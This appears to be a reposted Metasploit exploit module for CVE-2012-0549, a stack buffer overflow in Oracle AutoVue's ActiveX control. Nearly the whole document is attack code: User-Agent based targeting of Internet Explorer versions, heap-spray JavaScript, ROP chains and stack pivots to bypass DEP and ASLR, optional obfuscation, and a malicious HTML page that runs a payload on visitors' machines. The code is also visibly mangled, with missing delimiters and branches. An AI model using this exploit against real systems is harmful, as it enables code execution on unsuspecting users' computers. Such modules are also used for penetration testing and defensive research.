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Oracle AutoVue ActiveX Control SetMarkupMode Buffer Overflow
来源:http://www.metasploit.com 作者:juan 发布时间:2012-08-07  

# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
 Rank = NormalRanking

 include Msf::Exploit::Remote::HttpServer::HTML
 include Msf::Exploit::Remote::Seh
 include Msf::Exploit::Remote::BrowserAutopwn

  :ua_name    => HttpClients::IE,
  :ua_minver  => "6.0",
  :ua_maxver  => "9.0",
  :javascript => true,
  :os_name    => OperatingSystems::WINDOWS,
  :classid    => "{B6FCC215-D303-11D1-BC6C-0000C078797F}",
  :method     => "SetMarkupMode",
  :rank       => NormalRanking

 def initialize(info = {})
   'Name'           => 'Oracle AutoVue ActiveX Control SetMarkupMode Buffer Overflow',
   'Description'    => %q{
     This module exploits a vulnerability found in the AutoVue.ocx ActiveX control.
    The vulnerability, due to the insecure usage of an strcpy like function in the
    SetMarkupMode method, when handling a specially crafted sMarkup argument, allows
    to trigger a stack based buffer overflow which leads to code execution under the
    context of the user visiting a malicious web page.

    The module has been successfully tested against Oracle AutoVue Desktop Version
    20.0.0 (AutoVue.ocx on IE 6, 7, 8 and 9 (Java 6 needed to DEP and
    ASLR bypass).
   'Author'         =>
     'Brian Gorenc', # Vulnerability discovery
     'juan' # Metasploit module
   'License'        => MSF_LICENSE,
   'References'     =>
     [ 'CVE', '2012-0549' ],
     [ 'BID', '53077' ],
     [ 'OSVDB', '81439' ],
     [ 'URL', 'http://dvlabs.tippingpoint.com/advisory/TPTI-12-05' ],
     [ 'URL', 'http://www.oracle.com/technetwork/topics/security/cpuapr2012-366314.html' ]
   'DefaultOptions' =>
     'EXITFUNC' => 'process',

   'Payload'        =>
     'Space' => 948,
     'DisableNops' => true,
   'DefaultOptions'  =>
     'InitialAutoRunScript' => 'migrate -f'
   'Platform' => 'win',
   'Targets'        =>
     # AutoVue.ocx
     [ 'Automatic', {} ],
      'IE 6 on Windows XP SP3',
       'SprayBlocks' => 0x185,
       'SprayCounter' => '0x5f2', # 0x0c0c0c08
       'SprayOffset' => '0x600', # 0x0c0c0c24
       'Offset' => 1052,
       'Ret' => 0x0c0c0c0c,
       'Rop' => nil,
       'RandomHeap' => false
      'IE 7 on Windows XP SP3 / Windows Vista SP2',
       'SprayBlocks' => 0x185,
       'SprayCounter' => '0x5f2', # 0x0c0c0c08
       'SprayOffset' => '0x600', # 0x0c0c0c24
       'Offset' => 1052,
       'Ret' => 0x0c0c0c0c,
       'Rop' => nil,
       'RandomHeap' => false
      'IE 8 with Java 6 on Windows XP SP3/7 SP1/Vista SP2',
       'SprayBlocks' => 0x185,
       'SprayCounter' => '0x5f2', # 0x0c0c0c08
       'SprayStackPivot' => '0x5f6', # 0x0c0c0c10
       'SprayOffset' => '0x5fc', # 0x0c0c0c1c
       'Offset' => 1052,
       'Ret' => 0x0c0c0c0c,
       'Rop' => :jre,
       'RandomHeap' => false,
      'IE 9 with Java 6 on Windows 7 SP1',
       'SprayBlocks' => 0x1000,
       'SprayNops' => '0x5f6', # 0x0c0c0bfc
       'SprayCounter' => '0x5fc', # 0x0c0c0c08
       'SprayStackPivot' => '0x600', # 0x0c0c0c10
       'SprayOffset' => '0x606', # 0x0c0c0c1c
       'Offset' => 1052,
       'Ret' => 0x0c0c0c0c,
       'Rop' => :jre,
       'RandomHeap' => true,
   'Privileged'     => false,
   'DisclosureDate' => 'Apr 18 2012',
   'DefaultTarget'  => 0))

    OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
   ], self.class


 def get_easy_spray(t, js_code, js_nops, js_counter)

  spray = <<-JS
  var heap_obj = new heapLib.ie(0x20000);
  var code = unescape("#{js_code}");
  var nops = unescape("#{js_nops}");
  var counter = unescape("#{js_counter}");

  while (nops.length < 0x80000) nops += nops;

  var offset = nops.substring(0, #{t['SprayCounter']});
  var offset_2 = nops.substring(0, #{t['SprayOffset']} - offset.length - counter.length);
  var block_used = code.length + offset_2.length + counter.length + offset.length;
  var shellcode = offset + counter + offset_2  + code + nops.substring(0, 0x800 - block_used);

  while (shellcode.length < 0x40000) shellcode += shellcode;
  var block = shellcode.substring(0, (0x80000-6)/2);

  for (var z=1; z < #{t['SprayBlocks']}; z++) {


  return spray


 def get_aligned_spray(t, js_code, js_nops, js_counter, js_stack_pivot)

  spray = <<-JS
  var heap_obj = new heapLib.ie(0x20000);
  var code = unescape("#{js_code}");
  var nops = unescape("#{js_nops}");
  var counter = unescape("#{js_counter}");
  var stack_pivot = unescape("#{js_stack_pivot}")

  while (nops.length < 0x80000) nops += nops;

  var offset = nops.substring(0, #{t['SprayCounter']});
  var offset_2 = nops.substring(0, #{t['SprayStackPivot']} - offset.length - counter.length);
  var offset_3 = nops.substring(0, #{t['SprayOffset']} - offset.length - counter.length - offset_2.length - stack_pivot.length);
  var block_used = code.length + offset_3.length + stack_pivot.length + offset_2.length + counter.length + offset.length;
  var shellcode = offset + counter + offset_2  + stack_pivot + offset_3 + code + nops.substring(0, 0x800 - block_used);

  while (shellcode.length < 0x40000) shellcode += shellcode;
  var block = shellcode.substring(0, (0x80000-6)/2);

  for (var z=1; z < #{t['SprayBlocks']}; z++) {


  return spray


 # Spray published by corelanc0d3r
 # Exploit writing tutorial part 11 : Heap Spraying Demystified
 # See https://www.corelan.be/index.php/2011/12/31/exploit-writing-tutorial-part-11-heap-spraying-demystified/
 def get_random_spray(t, js_code, js_nops, js_90_nops, js_counter, js_stack_pivot)

  spray = <<-JS

  function randomblock(blocksize)
   var theblock = "";
   for (var i = 0; i < blocksize; i++)
    theblock += Math.floor(Math.random()*90)+10;
   return theblock;

  function tounescape(block)
   var blocklen = block.length;
   var unescapestr = "";
   for (var i = 0; i < blocklen-1; i=i+4)
    unescapestr += "%u" + block.substring(i,i+4);
   return unescapestr;

  var heap_obj = new heapLib.ie(0x10000);

  var code = unescape("#{js_code}");
  var nops = unescape("#{js_nops}");
  var nops_90 = unescape("#{js_90_nops}");
  var counter = unescape("#{js_counter}");
  var stack_pivot = unescape("#{js_stack_pivot}")

  while (nops_90.length < 0x80000) nops_90 += nops_90;

  for (var i=0; i <  #{t['SprayBlocks']}; i++) {
   var padding = unescape(tounescape(randomblock(0x1000)));
   while (padding.length < 0x1000) padding+= padding;

   var offset = padding.substring(0, #{t['SprayNops']});
   var offset_2 = padding.substring(0, #{t['SprayCounter']} - offset.length - nops.length);
   var offset_4 = padding.substring(0, #{t['SprayOffset']} - offset.length -  nops.length - offset_2.length - counter.length - nops.length - stack_pivot.length);
   var block_used = code.length + offset_4.length + stack_pivot.length + nops.length + counter.length + offset_2.length + nops.length + offset.length;
   var single_sprayblock = offset + nops + offset_2 + counter + nops  + stack_pivot + offset_4 + code + padding.substring(0, 0x800 - block_used);

   while (single_sprayblock.length < 0x20000) single_sprayblock += single_sprayblock;
   sprayblock = single_sprayblock.substring(0, (0x40000-6)/2);


  return spray

 def junk(n=4)
  return rand_text_alpha(n).unpack("V").first

 def nop
  return make_nops(4).unpack("V").first

 # stackpivot from msvcr71.dll
 def get_stack_pivot_stage_1
  rop = [ 0x7c341ae4 ].pack("V*") # ADD ESP,48 # RETN
  return rop

 # stackpivot from msvcr71.dll
 def get_stack_pivot_stage_2
  rop = [
   0x7c3522ca,  # ADD EAX,20 # RETN
   0x7c348b05,  # XCHG EAX,ESP # RETN
  rop = rop.gsub(/"/, "\\\"")
  return rop

 # ROP chain (msvcr71.dll) generated by mona.py - See corelan.be
 def get_rop_chain
  rop = [
   0x7c37653d,  # POP EAX # POP EDI # POP ESI # POP EBX # POP EBP # RETN
   0x00001000,  # (dwSize)
   0x7c347f98,  # RETN (ROP NOP)
   0x7c3415a2,  # JMP [EAX]
   0x7c376402,  # skip 4 bytes
   0x7c345255,  # INC EBX # FPATAN # RETN
   0x7c352174,  # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN
   0x7c344f87,  # POP EDX # RETN
   0x00000040,  # flNewProtect
   0x7c34d201,  # POP ECX # RETN
   0x7c38b001,  # &Writable location
   0x7c347f97,  # POP EAX # RETN
   0x7c37a151,  # ptr to &VirtualProtect() - 0x0EF
   0x7c378c81,  # PUSHAD # ADD AL,0EF # RETN
   0x7c345c30,  # ptr to 'push esp #  ret '

  return rop

 def get_target(agent)
  #If the user is already specified by the user, we'll just use that
  return target if target.name != 'Automatic'

  if agent =~ /NT 5\.1/ and agent =~ /MSIE 6/
   return targets[1]  #IE 6 on Windows XP SP3
  elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 7/
   return targets[2]  #IE 7 on Windows XP SP3
  elsif agent =~ /NT 6\.0/ and agent =~ /MSIE 7/
   return targets[2]  #IE 7 on Windows Vista SP2
  elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 8/
   return targets[3]  #IE 8 on Windows XP SP3
  elsif agent =~ /NT 6\.[01]/ and agent =~ /MSIE 8/
   return targets[3]  #IE 8 on Windows 7 SP1/Vista SP2
  elsif agent =~ /NT 6\.1/ and agent =~ /MSIE 9/
   return targets[4]  #IE 9 on Windows 7 SP1
   return nil

 def on_request_uri(cli, request)

  agent = request.headers['User-Agent']
  print_status("User-agent: #{agent}")

  my_target = get_target(agent)

  # Avoid the attack if the victim doesn't have a setup we're targeting
  if my_target.nil?
   print_error("Browser not supported: #{agent}")

  p = payload.encoded

  if my_target['Rop'].nil?
   js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(my_target.arch))
   js_stack_pivot = Rex::Text.to_unescape(get_stack_pivot_stage_1, Rex::Arch.endian(my_target.arch))
   js_code = Rex::Text.to_unescape(get_rop_chain + p, Rex::Arch.endian(my_target.arch))

  js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(my_target.arch))
  js_90_nops = Rex::Text.to_unescape(make_nops(4), Rex::Arch.endian(my_target.arch))
  js_counter = Rex::Text.to_unescape("\x01\x00\x00\x00", Rex::Arch.endian(my_target.arch))

  js = ""

  if my_target['RandomHeap']
   js = get_random_spray(my_target, js_code, js_nops, js_90_nops, js_counter, js_stack_pivot)
  elsif my_target['Rop']
   js = get_aligned_spray(my_target, js_code, js_nops, js_counter, js_stack_pivot)
   js = get_easy_spray(my_target, js_code, js_nops, js_counter)

  js = heaplib(js, {:noobfu => true})

  if datastore['OBFUSCATE']
   js = ::Rex::Exploitation::JSObfu.new(js)

  if my_target['Rop'].nil?
   sploit = rand_text_alpha(my_target['Offset'])
   sploit = rand_text_alpha(8)
   sploit << get_stack_pivot_stage_2
   # +1 because of the escape character in get_stack_pivot_stage_2
   sploit << rand_text_alpha(my_target['Offset'] - sploit.length + 1)
  sploit << [my_target.ret].pack("V")

  html = <<-MYHTML
  <object classid='clsid:B6FCC215-D303-11D1-BC6C-0000C078797F' id='obj' />
   setTimeout(function(){ obj.SetMarkupMode("#{sploit}"); }, 100);

  html = html.gsub(/^\t\t/, '')

  print_status("Sending html")
  send_response(cli, html, {'Content-Type'=>'text/html'})

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